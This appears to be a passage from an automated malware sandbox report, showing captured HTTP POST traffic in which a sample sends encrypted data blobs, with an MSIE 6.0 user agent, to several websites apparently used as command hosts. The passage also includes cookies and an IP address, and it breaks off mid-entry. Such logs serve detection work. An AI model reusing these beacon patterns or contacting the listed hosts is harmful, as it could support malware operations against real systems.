Rb3e+cTzD9AzPLph32yC9peHUkz8F38JOOWcBKI7Zonlfns0dUAxi3ifSKje9w6I5dnkEkAwRMhGnNsSgOHZKpDgWnqgrru86WnY2fmVPAfHhyJwcotFsPmmB3wspWOkJQM28iEclbTlJmG9YMtqclVXdvh706oU9mwn/9sTEVaz+JlP9CjPIZAD+zlBm8WlHpCeohoGCH3hHOWlASlSW83t06FESAk2f8qm5BaMiZT6KZcuujrOsfXehUFJHI+cxtpcT/Vmg6YBc6YXysoYiM4WSYmzEKopUx078NcHdmVWEfTFdHWJ1TxtH3+WiURwMCnFIwYaNI7vNy9rfpNqaFXuYtv0zet05NzEt/Q/fTfF6jZNf/e4/f+0/0wdVoVLXQW3KUtD8Xvg+SEJMJ1zL2G0hXaM5e8lBEX54O+OMINq/P6IuuLaMDZzad3i9JUmZTsbHHRT8ERTuZKU54VZ7XepVNT2SRNbO3knD0ir3SMEJag8gVSH7Eq1zoksm3FQNbwYh0YFfrCml/rGSiWtohXeRwsqkefivUjqRro43DZwKCmL/q4FejWG
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: __goc_session__=ietvmldvxeakytrdfhbatfsweopuymco; _mcnc=1Data Raw: 31 4b 79 74 58 74 76 34 38 63 2b 51 6b 70 36 66 38 74 68 43 67 73 51 6e 5a 4b 42 68 4e 4d 37 34 50 30 41 58 48 53 34 36 62 42 41 75 42 54 61 53 57 67 65 75 76 6f 2f 34 4a 2f 61 69 32 54 55 54 6b 4f 67 51 41 67 44 4d 65 44 43 53 36 39 73 75 7a 6e 71 6a 6f 43 30 4a 53 77 4f 65 48 4e 58 53 51 6c 48 4b 71 52 71 6f 63 2b 65 31 38 64 2f 74 56 45 46 38 4b 42 6e 57 49 72 54 76 53 44 62 46 2b 73 30 4b 32 65 58 4f 30 6f 6f 47 6f 6f 76 59 55 49 2f 62 6e 4a 78 43 65 78 54 6f 4d 45 59 41 48 7a 31 6f 45 64 45 7a 55 41 4e 44 71 62 61 31 49 49 67 54 56 2f 32 67 34 4e 6e 4e 2b 31 54 77 35 4f 54 6f 35 56 59 70 45 32 4e 67 41 7a 72 30 31 56 76 64 65 67 47 42 4b 31 54 4d 6e 4f 64 57 2b 74 6d 2f 76 47 41 79 6a 51 47 34 65 61 2f 4b 6b 34 63 42 75 71 44 33 56 57 52 77 4d 6b 6d 62 53 75 47 73 6c 4b 79 57 4e 53 76 48 6d 4f 68 43 5a 4f 30 34 30 75 73 71 58 51 77 63 42 43 55 47 78 32 34 4e 6b 54 6c 43 6b 53 4e 4e 64 54 6c 32 4d 6a 54 6d 59 6c 56 7a 53 43 58 38 56 76 72 32 66 54 48 49 73 44 57 66 75 37 72 6f 69 51 71 35 36 57 54 47 73 48 37 6b 37 75 54 76 72 44 41 69 36 69 30 49 2f 42 76 61 49 31 57 37 55 54 55 67 73 78 2b 76 6f 45 38 4b 30 41 6a 73 79 41 64 56 38 6a 52 4a 33 46 67 69 47 73 62 77 79 4d 2b 69 65 52 66 6f 49 61 58 42 6d 4b 6e 6c 52 31 78 4d 44 76 78 34 53 69 57 31 6e 44 2f 49 54 6c 66 6e 63 49 51 55 54 34 45 6e 48 6d 52 62 57 61 41 4f 2b 4c 67 4d 48 44 64 62 31 51 78 63 33 48 76 6b 48 4d 64 64 31 70 52 42 48 66 5a 59 6e 49 64 39 4f 50 45 33 72 47 32 50 39 6a 50 55 4f 76 73 39 7a 49 65 4f 63 47 31 73 32 37 6e 6b 78 51 75 47 5a 61 42 53 48 6c 6b 6b 78 79 6b 62 79 37 54 68 37 4d 45 44 34 64 6c 49 72 77 72 61 Data Ascii: 1KytXtv48c+Qkp6f8thCgsQnZKBhNM74P0AXHS46bBAuBTaSWgeuvo/4J/ai2TUTkOgQAgDMeDCS69suznqjoC0JSwOeHNXSQlHKqRqoc+e18d/tVEF8KBnWIrTvSDbF+s0K2eXO0ooGoovYUI/bnJxCexToMEYAHz1oEdEzUANDqba1IIgTV/2g4NnN+1Tw5OTo5VYpE2NgAzr01VvdegGBK1TMnOdW+tm/vGAyjQG4ea/Kk4cBuqD3VWRwMkmbSuGslKyWNSvHmOhCZO040usqXQwcBCUGx24NkTlCkSNNdTl2MjTmYlVzSCX8Vvr2fTHIsDWfu7roiQq56WTGsH7k7uTvrDAi6i0I/BvaI1W7UTUgsx+voE8K0AjsyAdV8jRJ3FgiGsbwyM+ieRfoIaXBmKnlR1xMDvx4SiW1nD/ITlfncIQUT4EnHmRbWaAO+LgMHDdb1Qxc3HvkHMdd1pRBHfZYnId9OPE3rG2P9jPUOvs9zIeOcG1s27nkxQuGZaBSHlkkxykby7Th7MED4dlIrwra
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 35 49 31 50 48 34 65 4b 41 4e 42 6c 77 66 30 76 74 73 62 57 69 6c 41 69 2f 44 64 39 74 51 57 78 71 7a 34 57 4d 55 65 50 32 2f 61 74 46 59 65 63 61 68 30 75 65 4c 79 77 75 53 4f 71 4a 61 7a 2b 31 50 4c 78 4e 39 48 46 6a 34 75 74 53 4c 4c 35 77 6e 59 73 52 6f 72 68 78 36 64 77 79 70 34 44 51 44 43 34 38 57 73 48 2f 50 71 78 52 4f 73 70 67 36 77 7a 58 36 6a 6f 70 69 56 50 73 52 6c 35 46 56 67 7a 79 59 4a 49 58 64 58 76 2f 73 32 64 38 63 39 45 79 55 51 74 38 2b 43 7a 47 5a 2f 36 68 39 4e 43 76 74 6e 6b 67 52 77 6f 4c 59 74 38 69 4e 6f 51 6d 6e 78 36 72 44 62 42 4e 37 6e 34 7a 53 30 6b 50 44 61 7a 43 50 6f 68 6f 2b 54 50 7a 4b 49 53 76 64 39 62 47 77 37 37 6c 43 47 38 54 77 6f 44 65 69 53 71 4a 49 48 73 2b 2b 74 5a 72 48 34 66 6c 65 42 78 6b 4f 6b 4a 6e 62 46 76 73 36 34 63 48 78 47 6b 7a 64 56 4e 59 6e 5a 33 42 76 59 46 34 46 44 59 75 33 6b 57 71 6e 71 67 70 59 50 6f 45 7a 6c 2f 44 54 34 30 6e 74 51 61 68 4c 30 6d 65 4b 61 75 52 2f 58 39 56 71 41 31 64 79 75 63 48 34 67 6b 53 74 39 37 35 59 2b 67 55 65 64 56 46 38 55 4d 70 64 47 35 42 2f 59 50 46 61 76 75 6c 49 72 61 56 56 6a 45 66 67 37 32 78 58 46 41 58 69 34 46 48 73 4c 59 44 4a 37 6d 6f 30 49 35 46 6d 55 65 61 48 63 74 6d 73 5a 37 39 6d 56 71 31 4c 56 51 64 72 41 66 41 6a 68 74 70 64 6e 63 70 59 54 70 64 46 45 45 69 4d 79 7a 57 61 5a 6c 55 4d 4e 41 6a 30 30 30 70 59 51 4f 69 4f 4d 51 7a 42 67 78 4b 75 51 50 72 6e 41 62 75 34 77 6e 72 77 37 7a 76 36 56 6e 6d 59 52 7a 59 74 4d 61 64 6c 73 2b 41 75 56 39 56 79 4e 34 36 2f 6f 4e 58 2b 31 7a 41 57 51 79 55 45 4b 38 6d 64 4a 73 74 65 63 4f 61 79 32 51 4a 6d 32 72 6a 34 33 30 6e 6f 37 64 45 36 78 4e 2f 2b 43 34 37 62 74 74 54 48 74 78 47 61 73 45 6d 4f 69 4c 59 4b 62 59 61 5a 79 36 46 78 30 2b 38 41 3d 3d Data Ascii: 5I1PH4eKANBlwf0vtsbWilAi/Dd9tQWxqz4WMUeP2/atFYecah0ueLywuSOqJaz+1PLxN9HFj4utSLL5wnYsRorhx6dwyp4DQDC48WsH/PqxROspg6wzX6jopiVPsRl5FVgzyYJIXdXv/s2d8c9EyUQt8+CzGZ/6h9NCvtnkgRwoLYt8iNoQmnx6rDbBN7n4zS0kPDazCPoho+TPzKISvd9bGw77lCG8TwoDeiSqJIHs++tZrH4fleBxkOkJnbFvs64cHxGkzdVNYnZ3BvYF4FDYu3kWqnqgpYPoEzl/DT40ntQahL0meKauR/X9VqA1dyucH4gkSt975Y+gUedVF8UMpdG5B/YPFavulIraVVjEfg72xXFAXi4FHsLYDJ7mo0I5FmUeaHctmsZ79mVq1LVQdrAfAjhtpdncpYTpdFEEiMyzWaZlUMNAj000pYQOiOMQzBgxKuQPrnAbu4wnrw7zv6VnmYRzYtMadls+AuV9VyN46/oNX+1zAWQyUEK8mdJstecOay2QJm2rj430no7dE6xN/+C47bttTHtxGasEmOiLYKbYaZy6Fx0+8A==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 46 32 4a 58 64 62 47 57 4a 4e 41 46 6f 44 6c 64 30 43 43 65 47 51 70 43 56 37 50 76 2f 58 52 63 64 63 42 56 42 70 36 6b 4a 69 34 49 61 61 33 59 37 50 34 61 33 69 47 45 4f 34 6d 65 4b 38 61 47 61 72 50 6e 42 67 6d 39 37 41 31 6b 54 43 74 2f 72 4d 69 2f 4e 4f 2f 51 61 69 6f 75 4e 32 4e 79 78 58 34 45 76 48 6f 70 31 6c 48 69 55 71 64 4b 63 2b 5a 4d 32 33 2b 34 57 6f 50 70 69 52 4b 69 67 52 34 66 62 4c 6f 4f 44 37 61 70 55 68 32 30 2b 65 71 68 33 43 62 4f 51 70 55 34 34 77 6e 58 77 79 6d 6f 32 76 7a 6c 44 55 37 57 49 71 71 67 53 2b 52 66 58 69 72 31 51 35 73 74 48 54 59 5a 36 73 68 35 5a 64 61 74 33 31 4c 57 39 4d 55 6a 48 4f 52 32 31 62 58 75 4a 48 62 33 72 4d 6e 76 63 39 45 62 55 4d 6b 52 4d 33 4e 6a 34 73 64 4c 75 52 63 55 39 2b 47 63 36 4c 7a 2f 51 63 57 73 59 6d 41 35 77 6f 55 66 44 4b 31 50 56 52 59 61 31 45 6f 51 48 42 33 75 6f 79 2f 6a 36 68 39 52 5a 67 50 45 5a 6f 34 34 36 4a 62 74 72 55 55 49 53 43 77 2b 53 5a 67 4c 45 72 58 45 73 6c 50 34 4f 32 79 6f 42 35 4d 69 50 50 77 4b 77 53 4d 4d 63 47 4a 37 71 5a 4a 74 36 51 4e 35 78 65 33 50 63 42 4d 37 44 6a 36 58 4f 72 51 7a 55 43 75 59 34 6a 6f 53 4f 35 30 6c 32 32 39 58 51 62 6c 30 64 58 55 49 2b 4d 65 4a 69 6e 46 56 63 46 5a 66 7a 71 76 47 70 32 48 64 39 4a 47 39 79 77 67 70 6e 55 72 30 78 43 6e 39 74 7a 63 6b 31 76 52 38 2b 4f 39 4b 7a 51 4b 41 30 67 43 42 46 51 47 78 4e 37 66 70 6b 6f 6b 74 4f 53 64 4a 4e 2b 39 6d 71 5a 76 73 6d 54 74 4c 41 38 70 42 57 72 43 37 76 32 47 44 64 57 51 43 62 64 58 43 58 33 33 6e 65 2b 34 4c 49 35 36 36 36 53 30 68 49 53 7a 42 46 76 51 58 34 30 46 54 64 79 4c 38 75 4d 4f 52 4c 33 77 3d Data Ascii: F2JXdbGWJNAFoDld0CCeGQpCV7Pv/XRcdcBVBp6kJi4Iaa3Y7P4a3iGEO4meK8aGarPnBgm97A1kTCt/rMi/NO/QaiouN2NyxX4EvHop1lHiUqdKc+ZM23+4WoPpiRKigR4fbLoOD7apUh20+eqh3CbOQpU44wnXwymo2vzlDU7WIqqgS+RfXir1Q5stHTYZ6sh5Zdat31LW9MUjHOR21bXuJHb3rMnvc9EbUMkRM3Nj4sdLuRcU9+Gc6Lz/QcWsYmA5woUfDK1PVRYa1EoQHB3uoy/j6h9RZgPEZo446JbtrUUISCw+SZgLErXEslP4O2yoB5MiPPwKwSMMcGJ7qZJt6QN5xe3PcBM7Dj6XOrQzUCuY4joSO50l229XQbl0dXUI+MeJinFVcFZfzqvGp2Hd9JG9ywgpnUr0xCn9tzck1vR8+O9KzQKA0gCBFQGxN7fpkoktOSdJN+9mqZvsmTtLA8pBWrC7v2GDdWQCbdXCX33ne+4LI5666S0hISzBFvQX40FTdyL8uMORL3w=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 46 32 4a 58 64 62 47 57 4a 4e 41 46 6f 44 6c 64 30 43 43 65 47 51 70 43 56 37 50 76 2f 58 52 63 64 63 42 56 42 70 36 6b 4a 69 34 49 61 61 33 59 37 50 34 61 33 69 47 45 4f 34 6d 65 4b 38 61 47 61 72 50 6e 42 67 6d 39 37 41 31 6b 54 43 74 2f 72 4d 69 2f 4e 4f 2f 51 61 69 6f 75 4e 32 4e 79 78 58 34 45 76 48 6f 70 31 6c 48 69 55 71 64 4b 63 2b 5a 4d 32 33 2b 34 57 6f 50 70 69 52 4b 69 67 52 34 66 62 4c 6f 4f 44 37 61 70 55 68 32 30 2b 65 71 68 33 43 62 4f 51 70 55 34 34 77 6e 58 77 79 6d 6f 32 76 7a 6c 44 55 37 57 49 71 71 67 53 2b 52 66 58 69 72 31 51 35 73 74 48 54 59 5a 36 73 68 35 5a 64 61 74 33 31 4c 57 39 4d 55 6a 48 4f 52 32 31 62 58 75 4a 48 62 33 72 4d 6e 76 63 39 45 62 55 4d 6b 52 4d 33 4e 6a 34 73 64 4c 75 52 63 55 39 2b 47 63 36 4c 7a 2f 51 63 57 73 59 6d 41 35 77 6f 55 66 44 4b 31 50 56 52 59 61 31 45 6f 51 48 42 33 75 6f 79 2f 6a 36 68 39 52 5a 67 50 45 5a 6f 34 34 36 4a 62 74 72 55 55 49 53 43 77 2b 53 5a 67 4c 45 72 58 45 73 6c 50 34 4f 32 79 6f 42 35 4d 69 50 50 77 4b 77 53 4d 4d 63 47 4a 37 71 5a 4a 74 36 51 4e 35 78 65 33 50 63 42 4d 37 44 6a 36 58 4f 72 51 7a 55 43 75 59 34 6a 6f 53 4f 35 30 6c 32 32 39 58 51 62 6c 30 64 58 55 49 2b 4d 65 4a 69 6e 46 56 63 46 5a 66 7a 71 76 47 70 32 48 64 39 4a 47 39 79 77 67 70 6e 55 72 30 78 43 6e 39 74 7a 63 6b 31 76 52 38 2b 4f 39 4b 7a 51 4b 41 30 67 43 42 46 51 47 78 4e 37 66 70 6b 6f 6b 74 4f 53 64 4a 4e 2b 39 6d 71 5a 76 73 6d 54 74 4c 41 38 70 42 57 72 43 37 76 32 47 44 64 57 51 43 62 64 58 43 58 33 33 6e 65 2b 34 4c 49 35 36 36 36 53 30 68 49 53 7a 42 46 76 51 58 34 30 46 54 64 79 4c 38 75 4d 4f 52 4c 33 77 3d Data Ascii: F2JXdbGWJNAFoDld0CCeGQpCV7Pv/XRcdcBVBp6kJi4Iaa3Y7P4a3iGEO4meK8aGarPnBgm97A1kTCt/rMi/NO/QaiouN2NyxX4EvHop1lHiUqdKc+ZM23+4WoPpiRKigR4fbLoOD7apUh20+eqh3CbOQpU44wnXwymo2vzlDU7WIqqgS+RfXir1Q5stHTYZ6sh5Zdat31LW9MUjHOR21bXuJHb3rMnvc9EbUMkRM3Nj4sdLuRcU9+Gc6Lz/QcWsYmA5woUfDK1PVRYa1EoQHB3uoy/j6h9RZgPEZo446JbtrUUISCw+SZgLErXEslP4O2yoB5MiPPwKwSMMcGJ7qZJt6QN5xe3PcBM7Dj6XOrQzUCuY4joSO50l229XQbl0dXUI+MeJinFVcFZfzqvGp2Hd9JG9ywgpnUr0xCn9tzck1vR8+O9KzQKA0gCBFQGxN7fpkoktOSdJN+9mqZvsmTtLA8pBWrC7v2GDdWQCbdXCX33ne+4LI5666S0hISzBFvQX40FTdyL8uMORL3w=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheCookie: btst=23d2d650a50ea91f96d166b8feecfbbf|84.17.52.43|1690487576|1690487542|17|2|0; snkz=84.17.52.43Data Raw: 6f 67 59 41 48 50 35 75 41 4e 41 4f 43 47 4c 51 79 63 70 37 7a 2b 47 30 44 4e 6d 2b 46 4e 45 75 45 73 64 74 51 38 32 6f 6c 55 62 30 53 47 43 48 31 41 53 65 64 49 7a 39 39 61 54 45 57 6c 52 7a 48 41 4c 4c 46 45 70 48 34 67 6e 44 47 2f 70 36 52 63 4c 57 51 63 65 7a 35 46 76 2b 6d 57 71 4c 69 48 31 46 50 63 76 69 6d 69 69 33 4f 63 73 73 31 75 49 71 6d 74 45 4b 6c 51 6b 51 44 4a 6f 75 57 48 36 39 36 6d 78 73 31 77 34 47 4c 50 46 58 71 59 55 36 76 41 6d 30 39 61 75 73 46 69 49 51 54 66 51 46 43 43 61 37 43 56 62 73 51 75 4e 7a 70 61 43 51 49 6b 36 79 49 35 41 33 31 6f 77 44 64 48 2b 77 58 78 5a 56 6f 6d 53 67 33 57 44 68 4d 72 47 6e 50 37 43 4a 42 58 66 41 64 63 76 77 47 47 64 7a 2f 46 66 38 4f 2b 4e 4e 74 76 37 79 6c 6b 71 5a 50 30 52 71 33 67 49 39 47 4e 53 31 6c 36 35 78 71 68 34 63 70 74 65 36 6e 47 4c 43 6b 59 44 4f 58 6e 47 36 55 78 43 53 44 4d 33 64 33 32 33 6f 55 4d 4f 4c 77 42 55 67 57 45 65 48 6d 6e 57 69 4f 32 6e 55 66 55 71 4d 6a 76 50 52 62 6c 63 49 55 32 45 64 37 4c 2f 34 78 51 61 79 58 4d 33 63 6d 6b 35 55 71 76 30 33 6f 68 4c 66 41 37 6e 36 51 48 71 46 61 68 39 4a 68 4a 52 6d 38 37 63 55 33 2f 77 6f 55 35 2f 4d 71 6a 78 73 77 72 45 50 50 47 31 7a 36 33 47 6e 75 39 31 78 52 6a 69 4a 39 34 50 64 64 4c 6b 73 54 4d 6b 36 30 5a 71 6f 51 2f 32 64 68 67 51 71 45 33 4d 4c 48 39 47 53 67 64 57 30 64 6e 4b 42 73 51 4d 6d 4a 64 31 69 64 32 6c 37 66 51 4d 51 32 74 32 46 7a 39 37 44 6c 72 79 67 61 4c 62 66 45 45 74 68 54 6c 2f 52 65 68 4f 6c 70 75 53 73 64 2b 66 66 7a 36 71 34 4e 7a 50 2b 31 77 4a 75 4c 49 4f 69 53 56 31 42 56 51 66 50 49 7a 6d 7a 2f 58 2f 68 77 6c 41 62 64 7a 34 73 64 6b 54 6e 31 4d 49 70 78 61 69 6e 4d 37 31 67 67 4e 68 31 43 48 5a 5a 4e 4b 6b 49 57 48 38 6f 50 59 35 47 56 6f 79 47 6c 2f 38 3d Data Ascii: ogYAHP5uANAOCGLQycp7z+G0DNm+FNEuEsdtQ82olUb0SGCH1ASedIz99aTEWlRzHALLFEpH4gnDG/p6RcLWQcez5Fv+mWqLiH1FPcvimii3Ocss1uIqmtEKlQkQDJouWH696mxs1w4GLPFXqYU6vAm09ausFiIQTfQFCCa7CVbsQuNzpaCQIk6yI5A31owDdH+wXxZVomSg3WDhMrGnP7CJBXfAdcvwGGdz/Ff8O+NNtv7ylkqZP0Rq3gI9GNS1l65xqh4cpte6nGLCkYDOXnG6UxCSDM3d323oUMOLwBUgWEeHmnWiO2nUfUqMjvPRblcIU2Ed7L/4xQayXM3cmk5Uqv03ohLfA7n6QHqFah9JhJRm87cU3/woU5/MqjxswrEPPG1z63Gnu91xRjiJ94PddLksTMk60ZqoQ/2dhgQqE3MLH9GSgdW0dnKBsQMmJd1id2l7fQMQ2t2Fz97DlrygaLbfEEthTl/RehOlpuSsd+ffz6q4NzP+1wJuLIOiSV1BVQfPIzmz/X/hwlAbdz4sdkTn1MIpxainM71ggNh1CHZZNKkIWH8oPY5GVoyGl/8=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 72 39 6c 4e 48 49 4e 78 41 4e 44 55 7a 73 38 39 69 75 6c 35 44 36 77 75 44 6c 6f 70 54 74 6e 52 5a 33 65 52 49 37 64 4a 50 4b 52 5a 7a 50 53 46 6a 65 4a 72 6b 68 74 76 54 6b 34 50 4b 75 63 77 45 6b 6e 49 2b 6f 72 71 33 41 2b 64 47 76 42 49 66 43 45 6c 78 72 67 68 47 79 77 4f 49 30 53 33 44 55 61 62 31 4d 69 76 59 73 38 54 64 46 42 61 76 4e 57 5a 53 59 44 34 5a 2b 53 48 46 69 51 66 4d 33 43 5a 36 36 6d 58 38 44 73 67 33 57 70 4d 48 79 50 65 43 6d 47 75 6b 47 79 70 68 6f 66 4c 79 54 69 34 4a 66 38 59 33 36 6d 30 43 47 31 74 61 78 56 55 6f 64 37 47 66 63 76 6b 46 49 79 2b 5a 36 53 44 76 33 51 47 76 68 72 35 4b 58 44 74 39 6b 5a 33 77 32 6d 58 59 47 41 70 30 63 4e 70 71 56 55 4b 45 4d 30 76 66 4e 6b 79 47 6e 4a 57 78 38 75 31 61 71 31 56 33 62 6f 58 54 57 63 5a 69 6b 38 66 33 4e 58 4c 32 32 67 6b 54 31 38 53 41 52 53 45 33 5a 2b 46 56 53 65 77 37 42 78 6a 68 51 34 6d 37 54 52 54 43 76 36 69 55 51 42 4a 48 4e 76 45 55 76 6c 2f 65 75 48 58 70 71 7a 6f 61 4c 78 52 65 6c 62 56 54 4f 2b 58 4d 7a 32 65 32 2f 5a 6b 51 76 54 62 41 4c 71 4d 31 4d 53 6a 65 6d 63 78 71 71 39 6b 4e 6c 77 4a 4e 58 2b 67 61 71 38 75 67 77 79 30 42 78 73 66 76 33 50 7a 31 6e 2f 33 6b 33 79 36 44 55 78 36 56 70 66 5a 49 53 33 70 56 30 52 4d 54 51 55 67 77 62 53 52 72 4f 43 34 35 6d 65 6e 4e 69 35 65 31 79 39 69 6c 7a 55 33 58 62 66 47 61 2b 51 49 63 4d 71 50 50 70 63 55 51 54 2b 6c 36 6b 4d 43 66 57 6e 47 4f 50 4e 69 6b 48 4b 63 65 74 6d 78 66 2b 70 43 44 45 78 4f 54 71 4d 51 49 66 5a 39 64 4d 65 50 56 75 57 53 33 79 39 35 4c 2b 5a 38 68 4e 46 77 49 73 78 46 41 51 36 39 59 41 71 46 53 50 70 62 77 69 63 44 34 62 59 48 57 6e 57 41 7a 61 59 4a 33 70 4f 77 63 42 79 34 4d 6b 54 7a 4c 43 34 52 45 44 73 75 35 48 37 39 62 57 6c 39 45 69 55 51 35 4f 4f 69 65 63 67 75 4a 53 75 70 Data Ascii: r9lNHINxANDUzs89iul5D6wuDlopTtnRZ3eRI7dJPKRZzPSFjeJrkhtvTk4PKucwEknI+orq3A+dGvBIfCElxrghGywOI0S3DUab1MivYs8TdFBavNWZSYD4Z+SHFiQfM3CZ66mX8Dsg3WpMHyPeCmGukGyphofLyTi4Jf8Y36m0CG1taxVUod7GfcvkFIy+Z6SDv3QGvhr5KXDt9kZ3w2mXYGAp0cNpqVUKEM0vfNkyGnJWx8u1aq1V3boXTWcZik8f3NXL22gkT18SARSE3Z+FVSew7BxjhQ4m7TRTCv6iUQBJHNvEUvl/euHXpqzoaLxRelbVTO+XMz2e2/ZkQvTbALqM1MSjemcxqq9kNlwJNX+gaq8ugwy0Bxsfv3Pz1n/3k3y6DUx6VpfZIS3pV0RMTQUgwbSRrOC45menNi5e1y9ilzU3XbfGa+QIcMqPPpcUQT+l6kMCfWnGOPNikHKcetmxf+pCDExOTqMQIfZ9dMePVuWS3y95L+Z8hNFwIsxFAQ69YAqFSPpbwicD4bYHWnWAzaYJ3pOwcBy4MkTzLC4REDsu5H79bWl9EiUQ5OOiecguJSup
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheCookie: myro_ct_dtl=eyJSRVFVRVNUX1VSSSI6IlwvIiwiUkVESVJFQ1RfVU5JUVVFX0lEIjoiWk1MSy1KcEcxblpSTGwyUFJGNUhld0FBQUJzIiwiUkVESVJFQ1RfU0NSSVBUX1VSTCI6IlwvIiwiUkVESVJFQ1RfU0NSSVBUX1VSSSI6Imh0dHA6XC9cL3d3dy5teXJvcGNiLmNvbVwvIiwiUkVESVJFQ1RfRE9DVU1FTlRfUk9PVCI6Ilwva3VuZGVuXC9ob21lcGFnZXNcLzlcL2QzMjgxNTE4NDdcL2h0ZG9jc1wvY2xpY2thbmRidWlsZHNcL215cm9wY2IiLCJSRURJUkVDVF9IVFRQX0FVVEhPUklaQVRJT04iOiIiLCJSRURJUkVDVF9IQU5ETEVSIjoieC1tYXBwLXBocDUiLCJSRURJUkVDVF9TVEFUVVMiOiIyMDAiLCJVTklRVUVfSUQiOiJaTUxLLUpwRzFuWlJMbDJQUkY1SGV3QUFBQnMiLCJTQ1JJUFRfVVJMIjoiXC8iLCJTQ1JJUFRfVVJJIjoiaHR0cDpcL1wvd3d3Lm15cm9wY2IuY29tXC8iLCJIVFRQX0hPU1QiOiJ3d3cubXlyb3BjYi5jb20iLCJDT05URU5UX0xFTkdUSCI6IjU1NiIsIkhUVFBfQUNDRVBUIjoiKlwvKiIsIkhUVFBfQUNDRVBUX0xBTkdVQUdFIjoiZW4tdXMiLCJDT05URU5UX1RZUEUiOiJhcHBsaWNhdGlvblwvb2N0ZXQtc3RyZWFtIiwiSFRUUF9VU0VSX0FHRU5UIjoiTW96aWxsYVwvNC4wIChjb21wYXRpYmxlOyBNU0lFIDYuMDsgV2luZG93cyBOVCA1LjE7IFNWMSkiLCJIVFRQX0NBQ0hFX0NPTlRST0wiOiJuby1jYWNoZSIsIlJFTU9URV9BRERSIjoiODQuMTcuNTIuNDMiLCJSRVFVRVNUX1NDSEVNRSI6Imh0dHAiLCJDT05URVhUX1BSRUZJWCI6Ilwvc3lzdGVtLWJpblwvIiwiQ09OVEVYVF9ET0NVTUVOVF9ST09UIjoiXC9rdW5kZW5cL3VzclwvbGliXC9jZ2ktYmluXC8iLCJSRU1PVEVfUE9SVCI6IjYwNzc0IiwiUkVESVJFQ1RfVVJMIjoiXC9pbmRleC5waHAiLCJSRVFVRVNUX01FVEhPRCI6IlBPU1QiLCJRVUVSWV9TVFJJTkciOiIiLCJTQ1JJUFRfTkFNRSI6IlwvaW5kZXgucGhwIiwiU1RBVFVTIjoiMjAwIiwiT1JJR19QQVRIX0lORk8iOiJcL2luZGV4LnBocCIsIk9SSUdfUEFUSF9UUkFOU0xBVEVEIjoiXC9rdW5kZW5cL2hvbWVwYWdlc1wvOVwvZDMyODE1MTg0N1wvaHRkb2NzXC9jbGlja2FuZGJ1aWxkc1wvbXlyb3BjYlwvaW5kZXgucGhwIiwiUEhQX1NFTEYiOiJcL2luZGV4LnBocCIsIlJFUVVFU1RfVElNRV9GTE9BVCI6MTY5MDQ4NzU0OC41MDc5MDksIlJFUVVFU1RfVElNRSI6MTY5MDQ4NzU0OCwiYXJndiI6W10sImFyZ2MiOjB9; myro_ct=eyJ1cmwiOiIiLCJpcCI6Ijg0LjE3LjUyLjQzIn0%3D; shield-notbot-nonce=6077383c26
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 67 6b 6a 49 6a 46 59 4a 48 64 42 59 45 67 57 72 4d 62 41 47 53 66 6b 34 70 74 37 32 71 5a 61 49 36 70 4a 2b 4c 6e 68 45 2b 4c 7a 72 6f 76 63 4f 73 4d 53 4e 51 55 62 46 53 46 75 73 4a 59 42 39 38 49 41 51 39 73 36 31 2b 53 75 50 43 72 39 69 38 65 6c 44 2f 32 79 48 6a 41 57 61 61 31 32 79 6f 56 43 34 49 2f 34 5a 4d 36 51 50 71 78 34 5a 50 32 49 57 6d 35 35 4c 77 72 41 33 38 4c 73 66 50 43 4f 46 71 32 51 62 36 32 35 44 70 4a 51 5a 42 6a 48 76 58 6f 32 69 56 63 56 65 67 61 72 53 58 37 33 41 73 73 77 6c 71 35 66 41 31 5a 49 59 6d 67 4a 75 31 50 34 4c 69 59 56 7a 52 79 59 41 70 72 63 4a 77 57 43 6d 42 50 5a 41 36 51 71 51 79 53 5a 31 6e 4f 6f 2f 43 73 49 55 32 61 57 43 52 75 5a 73 62 73 50 43 74 70 2f 2f 53 30 54 6e 79 6c 38 30 33 62 61 79 42 51 4b 6a 6a 39 43 59 47 44 2f 70 77 38 78 56 42 65 67 44 48 48 4a 4c 5a 62 69 7a 2b 50 37 41 51 34 7a 66 4c 51 32 78 6b 37 67 71 37 44 42 6a 68 76 52 79 42 6e 77 5a 37 31 39 63 63 69 2f 69 74 76 62 69 4b 59 4c 44 36 41 30 6a 7a 56 43 73 4d 72 6e 63 66 76 67 50 58 48 66 6c 7a 31 47 45 57 38 79 66 37 68 70 45 4b 4e 61 6d 75 6e 30 75 59 31 67 52 49 69 55 7a 47 75 42 41 33 4a 57 52 46 67 69 59 37 45 57 36 